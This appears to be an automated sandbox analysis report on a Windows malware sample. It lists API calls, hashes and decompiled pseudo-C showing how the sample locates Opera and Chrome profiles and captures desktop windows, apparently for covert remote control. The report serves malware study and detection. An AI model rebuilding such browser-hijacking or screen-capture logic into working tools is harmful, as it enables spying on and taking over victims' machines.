                                          • Instruction ID: 794d1d4d3b2fdd94490dae4e37114e5141e4b877368830f5e09ab6c07b8e1bdd
                                          • Opcode Fuzzy Hash: 159bf29e0f137b6d19e6b42216e7bb2768e01392b9899e155e9f77c7bead5438
                                          • Instruction Fuzzy Hash: E4312A76300B9186DB358F66E8407AE77A9F789B98F884126DF8D43B18DF38C646C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00C63486
                                          • NtCreateSection.NTDLL ref: 00C634D6
                                          • memset.NTDLL ref: 00C63501
                                          • RtlNtStatusToDosError.NTDLL ref: 00C6351D
                                          • ZwClose.NTDLL ref: 00C63533
                                            • Part of subcall function 00C636A8: NtMapViewOfSection.NTDLL ref: 00C636E2
                                            • Part of subcall function 00C636A8: RtlNtStatusToDosError.NTDLL ref: 00C636EA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorSectionStatusmemset$CloseCreateView
                                          • String ID:
                                          • API String ID: 4231514893-0
                                          • Opcode ID: e19e0639ccb1fa3b2e09695db12b4080b545d9305df54842d9e79da1bbed75ca
                                          • Instruction ID: 3421b3c6da858713b998daae17b3013be2efe7938aa905d79c13563a52a8e01c
                                          • Opcode Fuzzy Hash: e19e0639ccb1fa3b2e09695db12b4080b545d9305df54842d9e79da1bbed75ca
                                          • Instruction Fuzzy Hash: 3E312B72B10B548AE720CF62E48479D77B4F7887A8F544226EF5A97A48DF34CA85C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 49%
                                          			E00C7CDE8(void* __ecx, void* __edx, void* __eflags, signed long long __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, long long _a8, long long _a16, long long _a24) {
                                          				void* _v8;
                                          				intOrPtr _v16;
                                          				long long _v40;
                                          				char _v104;
                                          				long long _v120;
                                          				int _t17;
                                          				void* _t23;
                                          				intOrPtr _t27;
                                          				long long _t35;
                                          				void* _t47;
                                          				void* _t50;
                                          
                                          				_t54 = __rbp;
                                          				_t23 = __edx;
                                          				_t22 = __ecx;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t35 = __rcx;
                                          				_t27 = r9d;
                                          				_t52 = __r8;
                                          				_t50 = __rdx;
                                          				_t17 = E00C7C050(__rax, __rcx, __rcx + 0x88, __rdx, __r8);
                                          				if(_t17 != 0) {
                                          					_t17 = IsIconic();
                                          					_t30 = _t17;
                                          					if(_t17 == 0) {
                                          						_t47 = _t50;
                                          						_t60 =  *((intOrPtr*)(_t35 + 0x720));
                                          						_v120 = __r8;
                                          						_t17 = E00C7CCA0(__ecx, _t23, _t30, __rax, _t35, _t35, _t47, __r8,  *((intOrPtr*)(_t35 + 0x720)),  *((intOrPtr*)(_t35 + 0x728)));
                                          						if(_t17 != 0) {
                                          							_t8 = _t47 + 0x60; // 0x60
                                          							r8d = _t8;
                                          							memset(??, ??, ??);
                                          							r8d = 0;
                                          							E00C7CFB4(__rax, _t35, _t50,  &_v104, __r8, _t60);
                                          							asm("movups xmm0, [esi]");
                                          							_v40 = _t35;
                                          							_v16 = _t27;
                                          							asm("movdqu [esp+0x78], xmm0");
                                          							GetWindow(??, ??);
                                          							GetWindow(??, ??);
                                          							_t17 = E00C7CECC(_t22, r8d, __rax, _t35, __rax,  &_v104, _t52, _t54);
                                          						}
                                          					}
                                          				}
                                          				return _t17;
                                          			}


                                          APIs
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                          • IsIconic.USER32 ref: 00C7CE22
                                            • Part of subcall function 00C7CCA0: GetWindowRect.USER32 ref: 00C7CD0B
                                          • memset.NTDLL ref: 00C7CE5D
                                            • Part of subcall function 00C7CFB4: GetWindowRect.USER32 ref: 00C7CFCC
                                            • Part of subcall function 00C7CFB4: GetWindowLongPtrA.USER32 ref: 00C7CFFD
                                            • Part of subcall function 00C7CFB4: GetScrollBarInfo.USER32 ref: 00C7D020
                                            • Part of subcall function 00C7CFB4: memcpy.NTDLL ref: 00C7D040
                                            • Part of subcall function 00C7CFB4: GetScrollBarInfo.USER32 ref: 00C7D052
                                            • Part of subcall function 00C7CFB4: memcpy.NTDLL ref: 00C7D072
                                          • GetWindow.USER32 ref: 00C7CE8F
                                          • GetWindow.USER32 ref: 00C7CE9D
                                            • Part of subcall function 00C7CECC: memset.NTDLL ref: 00C7CF0B
                                            • Part of subcall function 00C7CECC: GetWindow.USER32 ref: 00C7CF5D
                                            • Part of subcall function 00C7CECC: GetWindow.USER32 ref: 00C7CF6B
                                            • Part of subcall function 00C7CECC: GetWindow.USER32 ref: 00C7CF86
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
• Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
• Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$InfoRectScrollmemcpymemset$AncestorIconicLong
                                          • String ID:
                                          • API String ID: 1868980946-0
                                          • Opcode ID: 6bb62e6d9125e0eea3aca33de264dbfa78a1ed7aa45a66b4ca7e5e5e3c10ecef
                                          • Instruction ID: 53df167f688a3ebf6c9c890374224c85f4ee395546fca6e9145230a52e2e7aee
                                          • Opcode Fuzzy Hash: 6bb62e6d9125e0eea3aca33de264dbfa78a1ed7aa45a66b4ca7e5e5e3c10ecef
                                          • Instruction Fuzzy Hash: BF114C66604B8186EB10DF22E580B6E73A5F798BC0F94C12AAF8D47B09DF38C545CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorSectionStatusView
                                          • String ID: @
                                          • API String ID: 1313840181-2766056989
                                          • Opcode ID: 9a9430f6e0c6e0034a70e1051b54e5bc3529ff825cbb78c458a32c68ee6eb9c2
                                          • Instruction ID: 0162171800d22f6351983ee297f8f76bcb9f45ef2825d3f22f0b83537e73f094
                                          • Opcode Fuzzy Hash: 9a9430f6e0c6e0034a70e1051b54e5bc3529ff825cbb78c458a32c68ee6eb9c2
                                          • Instruction Fuzzy Hash: A1E0C976A04B04C6E7209F20E48DB4D36A8F364354FA10229C79D02B50DF3A8AA9CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ColorObject$Select$CreateDeleteText$ClipCompatiblePaintRect$BeginBitmapClientDrawModeWindow
                                          • String ID: $%
                                          • API String ID: 1692378535-2111875603
                                          • Opcode ID: c14e002040add2d31ee41b0c70034e36200d1b0139c05a8f775b4a1b7ba1fd55
                                          • Instruction ID: cd271a62573cf0c023079b8fe6e8d010c8d2eac450d273367752e6661590715e
                                          • Opcode Fuzzy Hash: c14e002040add2d31ee41b0c70034e36200d1b0139c05a8f775b4a1b7ba1fd55
                                          • Instruction Fuzzy Hash: B6614A76701A518AFB14DF66E848B5D73A1F788F89F949225DE0A13B18DF38C50DC704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E00C77530(void* __edx, long long __rax, long long __rbx, void* __rcx, signed short* __rdx, long long __rsi, void* __r8, void* __r9) {
                                          				void* __rdi;
                                          				void* __r14;
                                          				long _t38;
                                          				long _t39;
                                          				void* _t40;
                                          				long _t41;
                                          				long _t45;
                                          				long _t57;
                                          				void* _t58;
                                          				long long _t70;
                                          				long long _t71;
                                          				void* _t92;
                                          				void* _t100;
                                          				char* _t105;
                                          				void* _t106;
                                          				signed long long _t110;
                                          				long long _t111;
                                          				long long _t113;
                                          				void* _t114;
                                          				void* _t116;
                                          				void* _t117;
                                          				void* _t119;
                                          				char* _t122;
                                          				void* _t123;
                                          				long long _t125;
                                          				long long _t127;
                                          				long long _t130;
                                          				signed short* _t133;
                                          
                                          				_t123 = __r9;
                                          				_t119 = __r8;
                                          				_t111 = __rsi;
                                          				_t71 = __rbx;
                                          				_t70 = __rax;
                                          				 *((long long*)(_t116 + 8)) = __rbx;
                                          				 *((long long*)(_t116 + 0x10)) = _t113;
                                          				 *((long long*)(_t116 + 0x18)) = __rsi;
                                          				_push(_t106);
                                          				_push(_t125);
                                          				_push(_t127);
                                          				_t117 = _t116 - 0x160;
                                          				_t45 = 0;
                                          				_t133 = __rdx;
                                          				_t57 = 0;
                                          				r12d = 0;
                                          				r13d = 0;
                                          				_t114 = __rcx;
                                          				E00C7A500(__rbx, __rcx, L"OPR", _t106, __rsi);
                                          				_t130 = _t70;
                                          				if(_t70 != 0) {
                                          					lstrcpyA();
                                          					lstrcatA(??, ??);
                                          					_t100 =  *((intOrPtr*)(_t114 + 0x38)) + 0x198;
                                          					lstrcatA(??, ??);
                                          					r8d = 0;
                                          					_t123 = _t117 + 0x20;
                                          					CreateEventA(??, ??, ??, ??);
                                          					_t111 = _t70;
                                          					if(_t70 != 0 && GetLastError() == 0xb7 && WaitForSingleObject() != 0) {
                                          						CloseHandle();
                                          						_t111 = _t71;
                                          					}
                                          					if(_t111 != 0) {
                                          						if(E00C77408(_t70, _t71, _t114) == 0) {
                                          							E00C76F88(_t70, _t71, _t114, _t106, _t111, _t119, _t130);
                                          							while((0x0000fffd & ( *_t133 & 0x0000ffff) - 0x00000020) == 0) {
                                          								_t133 =  &(_t133[1]);
                                          							}
                                          							_t12 = _t100 + 0x5c; // 0x5c
                                          							r8d = _t12;
                                          							__imp__StrRChrW();
                                          							_t110 = _t70 - _t133 >> 1;
                                          							_t58 = _t57 + 1;
                                          							r8d = _t58;
                                          							_t122 = _t119 + _t119;
                                          							HeapAlloc(??, ??, ??);
                                          							_t125 = _t70;
                                          							if(_t70 != 0) {
                                          								r8d = _t58;
                                          								lstrcpynW(??, ??, ??);
                                          								E00C7A8A0(_t70, _t71, _t114, _t133);
                                          								_t127 = _t70;
                                          								_t38 = E00C7FD2C(_t70, _t71, _t125, _t130, _t111);
                                          								_t57 = _t38;
                                          								if(_t38 == 0) {
                                          									r8d = 0;
                                          									_t39 = E00C771A0(_t70, _t71, _t114, L"APPDATA", _t110, _t111, _t122, _t123);
                                          									_t57 = _t39;
                                          									if(_t39 == 0) {
                                          										_t40 = E00C6ADD8();
                                          										_t92 = _t114;
                                          										if(_t40 > 5) {
                                          											r8d = 0;
                                          											_t105 = L"LOCALAPPDATA";
                                          										} else {
                                          											_t122 = L"\\Local Settings\\Application Data";
                                          											_t105 = L"USERPROFILE";
                                          										}
                                          										_t41 = E00C771A0(_t70, _t71, _t92, _t105, _t110, _t111, _t122, _t123);
                                          										goto L20;
                                          									}
                                          								}
                                          							} else {
                                          								_t13 = _t70 + 8; // 0x8
                                          								_t57 = _t13;
                                          							}
                                          						}
                                          					} else {
                                          						_t57 = 0x5b4;
                                          					}
                                          				} else {
                                          					_t41 = GetLastError();
                                          					L20:
                                          					_t57 = _t41;
                                          				}
                                          				E00C7A914(_t127, _t123);
                                          				if(_t57 == 0 && _t130 != 0) {
                                          					lstrcatW();
                                          					E00C80890(_t71, _t130, L"\\opera.exe", _t111, _t114);
                                          				}
                                          				if(_t111 != 0) {
                                          					SetEvent();
                                          					CloseHandle(??);
                                          				}
                                          				if(_t130 != 0) {
                                          					HeapFree();
                                          				}
                                          				if(_t125 != 0) {
                                          					HeapFree();
                                          				}
                                          				if(_t57 == 0) {
                                          					_t45 = 1;
                                          				} else {
                                          					SetLastError();
                                          				}
                                          				return _t45;
                                          			}

                                          APIs
                                            • Part of subcall function 00C7A500: GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A52B
                                            • Part of subcall function 00C7A500: GetLastError.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A537
                                            • Part of subcall function 00C7A500: HeapFree.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A661
                                          • GetLastError.KERNEL32 ref: 00C77575
                                          • lstrcpyA.KERNEL32 ref: 00C7758C
                                          • lstrcatA.KERNEL32 ref: 00C7759E
                                          • lstrcatA.KERNEL32 ref: 00C775B4
                                          • CreateEventA.KERNEL32 ref: 00C775C8
                                          • GetLastError.KERNEL32 ref: 00C775D6
                                          • WaitForSingleObject.KERNEL32 ref: 00C775EB
                                          • CloseHandle.KERNEL32 ref: 00C775F8
                                          • lstrcatW.KERNEL32 ref: 00C77708
                                          • SetEvent.KERNEL32 ref: 00C77720
                                          • CloseHandle.KERNEL32 ref: 00C77729
                                          • HeapFree.KERNEL32 ref: 00C77740
                                          • HeapFree.KERNEL32 ref: 00C77757
                                          • SetLastError.KERNEL32 ref: 00C77763
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$FreeHeaplstrcat$CloseEventHandle$CreateObjectPathSingleTempWaitlstrcpy
                                          • String ID: APPDATA$LOCALAPPDATA$OPR$USERPROFILE$\Local Settings\Application Data$\opera.exe
                                          • API String ID: 1059675241-2210929480
                                          • Opcode ID: 13db4fb79f4a3c3d53eaede1588cd29ad5dab95579c290c721b79de04102e414
                                          • Instruction ID: 7532f7a6802c81831adf4a1260fc6a56a0861f2de0acd64dd766655fc0c04c02
                                          • Opcode Fuzzy Hash: 13db4fb79f4a3c3d53eaede1588cd29ad5dab95579c290c721b79de04102e414
                                          • Instruction Fuzzy Hash: 9E51B165304F0582FB25AB26E854B6A6361BB85FD4F94C621ED1E47B28EF3CC94AC344
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WindowFromPoint.USER32(?,?,?,?,?,?,?,?,?,00000000,?,00008001,00000000,00C7998F), ref: 00C7C4B5
                                          • SendMessageTimeoutA.USER32 ref: 00C7C4F7
                                          • RealChildWindowFromPoint.USER32(?,?,?,?,?,?,?,?,?,00000000,?,00008001,00000000,00C7998F), ref: 00C7C585
                                          • SendMessageTimeoutA.USER32 ref: 00C7C5C2
                                          • GetWindowLongPtrA.USER32 ref: 00C7C5F1
                                          • SetWindowLongPtrA.USER32 ref: 00C7C607
                                            • Part of subcall function 00C7C47C: GetWindowLongPtrA.USER32 ref: 00C7C63F
                                            • Part of subcall function 00C7C47C: SetWindowLongPtrA.USER32 ref: 00C7C652
                                          • ScreenToClient.USER32 ref: 00C7C67A
                                          • SendMessageTimeoutA.USER32 ref: 00C7C6C0
                                          • GetAncestor.USER32 ref: 00C7C6EE
                                          • GetWindowLongPtrA.USER32 ref: 00C7C734
                                          • GetWindowInfo.USER32 ref: 00C7C754
                                          • PtInRect.USER32 ref: 00C7C77C
                                          • GetWindowLongPtrA.USER32 ref: 00C7C7AC
                                          • SendMessageTimeoutA.USER32 ref: 00C7C7F4
                                          • MapWindowPoints.USER32 ref: 00C7C825
                                          • MapWindowPoints.USER32 ref: 00C7C84C
                                          • RealChildWindowFromPoint.USER32 ref: 00C7C859
                                          • SendMessageTimeoutA.USER32 ref: 00C7C8B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Long$MessageSendTimeout$FromPoint$ChildPointsReal$AncestorClientInfoRectScreen
                                          • String ID: d
                                          • API String ID: 4017282500-2564639436
                                          • Opcode ID: 8507a3016438b6ddf8f0eeac2c1db0038eeebe7a5efc903a5fd3631a5ab62723
                                          • Instruction ID: 062b307d5504b20cdf34b3051d092bef0b8b4679640526f02f60c9f308ffa1d6
                                          • Opcode Fuzzy Hash: 8507a3016438b6ddf8f0eeac2c1db0038eeebe7a5efc903a5fd3631a5ab62723
                                          • Instruction Fuzzy Hash: 59B16E32311B41CAEB208F65E4847AD6371F748B98F40822AEE6E47F99DF38D509C715
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: EnvironmentErrorHeapLastVariable$AllocFreelstrlen
                                          • String ID: \Opera$_OPR$opera.exe
                                          • API String ID: 2673498452-2944665979
                                          • Opcode ID: b89749c707e4ee9a4dca77185ae99192fa902325a018c9f7abfb8c721f157e5f
                                          • Instruction ID: 886371d13a67a4ebcc5cf150df6737541a10aa16f91d92ae9b7f0c9c6a2dea38
                                          • Opcode Fuzzy Hash: b89749c707e4ee9a4dca77185ae99192fa902325a018c9f7abfb8c721f157e5f
                                          • Instruction Fuzzy Hash: 22517876304B5582FB14DF22E844B5863A1BB89FE4F88C315ED2A43B64EF38C64A8704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E00C7E7C0(signed int __ecx, void* __edx, long long __rbx, long long __rsi, long long __rbp, void* __r9) {
                                          				void* _v40;
                                          				long long _v80;
                                          				intOrPtr _v88;
                                          				long _t38;
                                          				long long _t64;
                                          				long long _t65;
                                          				long long _t90;
                                          				long long _t93;
                                          				long long _t95;
                                          				long long _t97;
                                          				struct HWND__* _t106;
                                          				int _t109;
                                          				int _t111;
                                          				void* _t114;
                                          
                                          				_t65 = __rbx;
                                          				_t64 = _t97;
                                          				 *((long long*)(_t64 + 8)) = __rbx;
                                          				 *((long long*)(_t64 + 0x10)) = __rbp;
                                          				 *((long long*)(_t64 + 0x18)) = __rsi;
                                          				_t38 = 0;
                                          				r14d = __ecx;
                                          				 *((intOrPtr*)(_t64 - 0x58)) = 0;
                                          				_t6 = _t65 + 0x20; // 0x20
                                          				r8d = _t6;
                                          				memset(_t114, _t111, _t109);
                                          				GetDC(_t106);
                                          				_t95 = _t64;
                                          				if(_t64 == 0) {
                                          					L10:
                                          					return _t38;
                                          				}
                                          				CreateCompatibleDC();
                                          				_t90 = _t64;
                                          				if(_t64 == 0) {
                                          					L9:
                                          					ReleaseDC();
                                          					goto L10;
                                          				}
                                          				r8d = r14d;
                                          				CreateCompatibleBitmap(??, ??, ??);
                                          				_t93 = _t64;
                                          				if(_t64 == 0) {
                                          					L8:
                                          					DeleteDC();
                                          					goto L9;
                                          				}
                                          				SelectObject();
                                          				E00C7B940(_t64, __rbx, _t90, "Progman", _t93, _t95, "Program Manager");
                                          				if(_t64 != 0) {
                                          					r8d = 0;
                                          					E00C7B940(_t64, _t65, _t64, "SHELLDLL_DefView", _t93, _t95, "Program Manager");
                                          					if(_t64 != 0) {
                                          						E00C7B940(_t64, _t65, _t64, "SysListView32", _t93, _t95, "FolderView");
                                          						if(_t64 != 0) {
                                          							r8d = 0xc00000;
                                          							SendMessageA(??, ??, ??, ??);
                                          							_t7 = _t65 - 0x10; // -16
                                          							r13d = _t7;
                                          							r8d = GetWindowLongA(??, ??) | 0x10000000;
                                          							SetWindowLongA(??, ??, ??);
                                          							r8d = GetWindowLongA(??, ??) | 0x10000000;
                                          							SetWindowLongA(??, ??, ??);
                                          							r8d = GetWindowLongA(??, ??) | 0x10000000;
                                          							SetWindowLongA(??, ??, ??);
                                          							_v88 = 1;
                                          							r8d = 0;
                                          							_v80 = _t93;
                                          							_t38 = SendMessageA(??, ??, ??, ??);
                                          						}
                                          					}
                                          				}
                                          				DeleteObject();
                                          				goto L8;
                                          			}
                                          0x00c7e7c0
                                          0x00c7e7c0
                                          0x00c7e7c3
                                          0x00c7e7c7
                                          0x00c7e7cb
                                          0x00c7e7dc
                                          0x00c7e7e0
                                          0x00c7e7e3
                                          0x00c7e7ec
                                          0x00c7e7ec
                                          0x00c7e7f0
                                          0x00c7e7f7
                                          0x00c7e7fd
                                          0x00c7e803
                                          0x00c7e962
                                          0x00c7e981
                                          0x00c7e981
                                          0x00c7e80c
                                          0x00c7e812
                                          0x00c7e818
                                          0x00c7e957
                                          0x00c7e95c
                                          0x00000000
                                          0x00c7e95c
                                          0x00c7e81e
                                          0x00c7e826
                                          0x00c7e82c
                                          0x00c7e832
                                          0x00c7e94e
                                          0x00c7e951
                                          0x00000000
                                          0x00c7e951
                                          0x00c7e83e
                                          0x00c7e854
                                          0x00c7e85f
                                          0x00c7e865
                                          0x00c7e872
                                          0x00c7e87d
                                          0x00c7e894
                                          0x00c7e89f
                                          0x00c7e8b1
                                          0x00c7e8ba
                                          0x00c7e8c0
                                          0x00c7e8c0
                                          0x00c7e8dd
                                          0x00c7e8e0
                                          0x00c7e8fa
                                          0x00c7e8fd
                                          0x00c7e917
                                          0x00c7e91a
                                          0x00c7e925
                                          0x00c7e92d
                                          0x00c7e930
                                          0x00c7e943
                                          0x00c7e943
                                          0x00c7e89f
                                          0x00c7e87d
                                          0x00c7e948
                                          0x00000000

                                          APIs
                                          • memset.NTDLL(?,?,?,?,?,?,?,?,?,00C68CF2), ref: 00C7E7F0
                                          • GetDC.USER32 ref: 00C7E7F7
                                          • CreateCompatibleDC.GDI32 ref: 00C7E80C
                                          • CreateCompatibleBitmap.GDI32 ref: 00C7E826
                                          • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,00C68CF2), ref: 00C7E83E
                                            • Part of subcall function 00C7B940: FindWindowExA.USER32 ref: 00C7B986
                                          • DeleteObject.GDI32 ref: 00C7E948
                                            • Part of subcall function 00C7B940: Sleep.KERNEL32(?,?,?,00C68A63,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7B975
                                          • SendMessageA.USER32 ref: 00C7E8BA
                                          • GetWindowLongA.USER32 ref: 00C7E8CA
                                          • SetWindowLongA.USER32 ref: 00C7E8E0
                                          • GetWindowLongA.USER32 ref: 00C7E8EC
                                          • SetWindowLongA.USER32 ref: 00C7E8FD
                                          • GetWindowLongA.USER32 ref: 00C7E909
                                          • SetWindowLongA.USER32 ref: 00C7E91A
                                          • SendMessageA.USER32 ref: 00C7E93D
                                          • DeleteDC.GDI32 ref: 00C7E951
                                          • ReleaseDC.USER32 ref: 00C7E95C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Long$CompatibleCreateDeleteMessageObjectSend$BitmapFindReleaseSelectSleepmemset
                                          • String ID: FolderView$Progman$Program Manager$SHELLDLL_DefView$SysListView32
                                          • API String ID: 1800107338-1763248648
                                          • Opcode ID: 53a34a5daeb79ae94d50f395825139e51be9b516ac447535f6e0b4f6bbccd857
                                          • Instruction ID: edb4a067f89926029561c3a4c82b716b53b62a78bd49959e6454e2a31d1d9a2c
                                          • Opcode Fuzzy Hash: 53a34a5daeb79ae94d50f395825139e51be9b516ac447535f6e0b4f6bbccd857
                                          • Instruction Fuzzy Hash: BA41A526311B4082FF24EB26A818B6A63A1FB49FD4F84C6259E2E47B54DF3CC90DC304
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CloseEventHandle$lstrcpy$ByteCharCreateErrorLastMultiObjectOpenSingleWaitWidelstrlen
                                          • String ID: LOCALAPPDATA$chrome.exe
                                          • API String ID: 2873254647-1937607147
                                          • Opcode ID: 33e55e4f1397d8173686ae51d366145c42bf2077f7b06a87ce29f12424db1e12
                                          • Instruction ID: decace0a8568cdfff8618caa35e6e6e9be458a0d6688ac8740ccbebd79357885
                                          • Opcode Fuzzy Hash: 33e55e4f1397d8173686ae51d366145c42bf2077f7b06a87ce29f12424db1e12
                                          • Instruction Fuzzy Hash: 7C515232201A81D5EB249F26EC54BAD3361FB85BA4F848615DE2E47BA4DF38C64DC345
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDC.USER32 ref: 00C7DBF2
                                            • Part of subcall function 00C7EAA8: CreateDIBSection.GDI32 ref: 00C7EAC7
                                          • SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC0E
                                          • DeleteObject.GDI32 ref: 00C7DC1B
                                          • DeleteDC.GDI32 ref: 00C7DC28
                                          • CreateCompatibleDC.GDI32 ref: 00C7DC31
                                          • GetLastError.KERNEL32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC43
                                          • SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC7C
                                          • SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DC9C
                                          • DeleteObject.GDI32 ref: 00C7DCA9
                                          • DeleteDC.GDI32 ref: 00C7DCB6
                                          • CreateCompatibleDC.GDI32 ref: 00C7DCBF
                                          • CreateCompatibleBitmap.GDI32 ref: 00C7DCE5
                                          • SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DD05
                                          • SelectObject.GDI32(?,?,00000088,00C7E358,?,?,?,00000000,00000000,00C688C0,?,?,?,?,?,00C61F56), ref: 00C7DD2D
                                          • DeleteObject.GDI32 ref: 00C7DD47
                                          • DeleteDC.GDI32 ref: 00C7DD61
                                          • SelectObject.GDI32 ref: 00C7DD94
                                          • DeleteObject.GDI32 ref: 00C7DDAE
                                          • DeleteDC.GDI32 ref: 00C7DDC8
                                          • ReleaseDC.USER32 ref: 00C7DDE0
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Object$Delete$Select$Create$Compatible$BitmapErrorLastReleaseSection
                                          • String ID:
                                          • API String ID: 3938452263-0
